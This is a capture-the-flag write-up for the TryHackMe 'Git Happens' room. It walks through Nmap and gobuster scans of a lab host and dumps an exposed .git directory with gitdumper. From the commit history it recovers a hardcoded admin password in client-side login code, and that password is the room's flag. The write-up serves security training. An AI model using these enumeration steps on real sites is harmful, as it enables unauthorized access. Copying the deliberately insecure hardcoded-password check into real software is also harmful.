TryHackMe-Git-Happens
Jump to navigation
Jump to search
Boss wanted me to create a prototype, so here it is! We even used something called “version control” that made deploying this really easy!
Can you find the password to the application?
Nmap discovery
Let’s start by scanning the target with Nmap. We discover a web service running on standard port 80/tcp:
PORT STATE SERVICE VERSION 80/tcp open http nginx 1.14.0 (Ubuntu) | http-git: | 10.10.113.201:80/.git/ | Git repository found! |_ Repository description: Unnamed repository; edit this file 'description' to name the... |_http-server-header: nginx/1.14.0 (Ubuntu) |_http-title: Super Awesome Site! Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Git repo
Nmap script also discovered a git repository, which we can confirm with gobuster:
kali@kali:/data/Git_Happens$ gobuster dir -u http://10.10.113.201 -w /usr/share/wordlists/dirb/common.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.113.201 [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/common.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/08/27 08:31:16 Starting gobuster =============================================================== /.git/HEAD (Status: 200) /css (Status: 301) /index.html (Status: 200) =============================================================== 2020/08/27 08:32:02 Finished ===============================================================
Dump the git repo
Let’s use gitdumper from GitTools to download the content of the Git repo:
kali@kali:/data/src/GitTools/Dumper$ ./gitdumper.sh http://10.10.113.201/.git/ /data/Git_Happens/files/ ########### # GitDumper is part of https://github.com/internetwache/GitTools # # Developed and maintained by @gehaxelt from @internetwache # # Use at your own risk. Usage might be illegal in certain circumstances. # Only for educational purposes! ########### [*] Destination folder does not exist [+] Creating /data/Git_Happens/files//.git/ [+] Downloaded: HEAD [-] Downloaded: objects/info/packs [+] Downloaded: description [+] Downloaded: config [-] Downloaded: COMMIT_EDITMSG [+] Downloaded: index [+] Downloaded: packed-refs [+] Downloaded: refs/heads/master [-] Downloaded: refs/remotes/origin/HEAD [-] Downloaded: refs/stash [+] Downloaded: logs/HEAD [+] Downloaded: logs/refs/heads/master [-] Downloaded: logs/refs/remotes/origin/HEAD [-] Downloaded: info/refs [+] Downloaded: info/exclude [-] Downloaded: /refs/wip/index/refs/heads/master [-] Downloaded: /refs/wip/wtree/refs/heads/master [+] Downloaded: objects/d0/b3578a628889f38c0affb1b75457146a4678e5 [-] Downloaded: objects/00/00000000000000000000000000000000000000 [+] Downloaded: objects/b8/6ab47bacf3550a5450b0eb324e36ce46ba73f1 [+] Downloaded: objects/77/aab78e2624ec9400f9ed3f43a6f0c942eeb82d [+] Downloaded: objects/f1/4bcee8053e39eeb414053db4ec7b985f65edc8 [+] Downloaded: objects/9d/74a92581071ae7c4a470ff035e0de4598877e5 [+] Downloaded: objects/20/9515b2f7cbdfb731d275c4b089e41ba35c3bc8 [+] Downloaded: objects/5a/35c9b7c787c22f689d0364cf57b013a11561a2 [+] Downloaded: objects/08/906612dfe6821cebc21794eb85601fc4f54de9 [+] Downloaded: objects/4a/2aab268541cbcc434e0565b4f4f2deca29ee5f [+] Downloaded: objects/7c/578d86a8713b67af2cb1b1d7c524c23cefe7aa [+] Downloaded: objects/4e/7178fa5b68fec15e54f2b79ace6f9ce0169e01 [+] Downloaded: objects/2e/b93ac3534155069a8ef59cb25b9c1971d5d199 [+] Downloaded: objects/4c/f757268c6824041664d132a29908aa9c362a26 [+] Downloaded: objects/3a/39b02d3b9d12222bac4737ee67e31403d62f13 [+] Downloaded: objects/ae/f68b1e25df81a8c96ee4d57b20cc9f7a1ebee5 [+] Downloaded: objects/d6/df4000639981d032f628af2b4d03b8eff31213 [+] Downloaded: objects/56/820adbbd5ac0f66f61916122c94ea52937e9b2 [+] Downloaded: objects/d9/54a99b96ff11c37a558a5d93ce52d0f3702a7d [+] Downloaded: objects/06/012255f074d7bc4acc6fadbcff004380b5f83b [+] Downloaded: objects/bc/8054d9d95854d278359a432b6d97c27e24061d [+] Downloaded: objects/dd/13038df878d41b774ce4fd4552091d46873c25 [+] Downloaded: objects/8c/94b154aef92380e29a3f16f1a889b56127cf13 [+] Downloaded: objects/e5/6eaa8e29b589976f33d76bc58a0c4dfb9315b1 [+] Downloaded: objects/48/926fdeb371c8ba174b1669d102e8c873afabf1 [+] Downloaded: objects/ce/b8d530ebcf79806dffc981905ec8c2e0d7a65b [+] Downloaded: objects/87/bcbcb476578c6cc90ed39f9404292539fe1c9c [+] Downloaded: objects/39/5e087334d613d5e423cdf8f7be27196a360459 [-] Downloaded: objects/40/04c23a71fd6ba9b03ec9cb7eed08471197d843 [-] Downloaded: objects/19/a865c5442a9d6a7c7cbea070f3cb6aa5106ef8 [-] Downloaded: objects/0f/679a88dbbaf89ff64cb351a151a5f29819a3c0 [+] Downloaded: objects/0e/abcfcd62467d64fb30b889e8de5886e028c3ed [+] Downloaded: objects/ba/5e4a76e3f7b6c49850c41716f8f1091fbdc84e [+] Downloaded: objects/2f/423697bf81fe5956684f66fb6fc6596a1903cc [+] Downloaded: objects/e3/8d9df9b13e6499b749e36e064ec30f2fa45657 [+] Downloaded: objects/0e/0de07611ada4690fc0ea5b5c04721ba6f3fd0d [+] Downloaded: objects/66/64f4e548df7591da3728d7662b6376debfce8d
Git logs
Now, let’s check the logs. We can see several commits.
kali@kali:/data/Git_Happens/files$ git log commit d0b3578a628889f38c0affb1b75457146a4678e5 (HEAD -> master, tag: v1.0) Author: Adam Bertrand <[email protected]> Date: Thu Jul 23 22:22:16 2020 +0000 Update .gitlab-ci.yml commit 77aab78e2624ec9400f9ed3f43a6f0c942eeb82d Author: Hydragyrum <[email protected]> Date: Fri Jul 24 00:21:25 2020 +0200 add gitlab-ci config to build docker file. commit 2eb93ac3534155069a8ef59cb25b9c1971d5d199 Author: Hydragyrum <[email protected]> Date: Fri Jul 24 00:08:38 2020 +0200 setup dockerfile and setup defaults. commit d6df4000639981d032f628af2b4d03b8eff31213 Author: Hydragyrum <[email protected]> Date: Thu Jul 23 23:42:30 2020 +0200 Make sure the css is standard-ish! commit d954a99b96ff11c37a558a5d93ce52d0f3702a7d Author: Hydragyrum <[email protected]> Date: Thu Jul 23 23:41:12 2020 +0200 re-obfuscating the code to be really secure! commit bc8054d9d95854d278359a432b6d97c27e24061d Author: Hydragyrum <[email protected]> Date: Thu Jul 23 23:37:32 2020 +0200 Security says obfuscation isn't enough. They want me to use something called 'SHA-512' commit e56eaa8e29b589976f33d76bc58a0c4dfb9315b1 Author: Hydragyrum <[email protected]> Date: Thu Jul 23 23:25:52 2020 +0200 Obfuscated the source code. Hopefully security will be happy! commit 395e087334d613d5e423cdf8f7be27196a360459 Author: Hydragyrum <[email protected]> Date: Thu Jul 23 23:17:43 2020 +0200 Made the login page, boss! commit 2f423697bf81fe5956684f66fb6fc6596a1903cc Author: Adam Bertrand <[email protected]> Date: Mon Jul 20 20:46:28 2020 +0000 Initial commit (END)
Show files
Based on these commits, we can use git show to highlight files modifications from the commits (we’ll start with the reverse order for the commits). For the initial commit with ID 2f423697bf81fe5956684f66fb6fc6596a1903cc, there is nothing interesting, but the second commit with ID 395e087334d613d5e423cdf8f7be27196a360459 reveals the source code of the page, where credentials appear in the clear:
kali@kali:/data/Git_Happens/files$ git show 395e087334d613d5e423cdf8f7be27196a360459 commit 395e087334d613d5e423cdf8f7be27196a360459 Author: Hydragyrum <[email protected]> Date: Thu Jul 23 23:17:43 2020 +0200 [REDACTED] + <script> + function login() { + let form = document.getElementById("login-form"); + console.log(form.elements); + let username = form.elements["username"].value; + let password = form.elements["password"].value; + if ( + username === "admin" && + password === "Th1s_1s_4_L0ng_4nd_S3cur3_P4ssw0rd!" + ) { + document.cookie = "login=1"; + window.location.href = "/dashboard.html"; + } else { + document.getElementById("error").innerHTML = + "INVALID USERNAME OR PASSWORD!"; + } + } + </script> + </body> +</html> (END)
Authenticate
Now that we have the credentials (admin:Th1s_1s_4_L0ng_4nd_S3cur3_P4ssw0rd!), we can use them against the authentication page (http://10.10.113.201). It redirects to http://10.10.113.201/dashboard.html with a message: Awesome! Use the password you input as the flag!
Flag
Flag: Th1s_1s_4_L0ng_4nd_S3cur3_P4ssw0rd!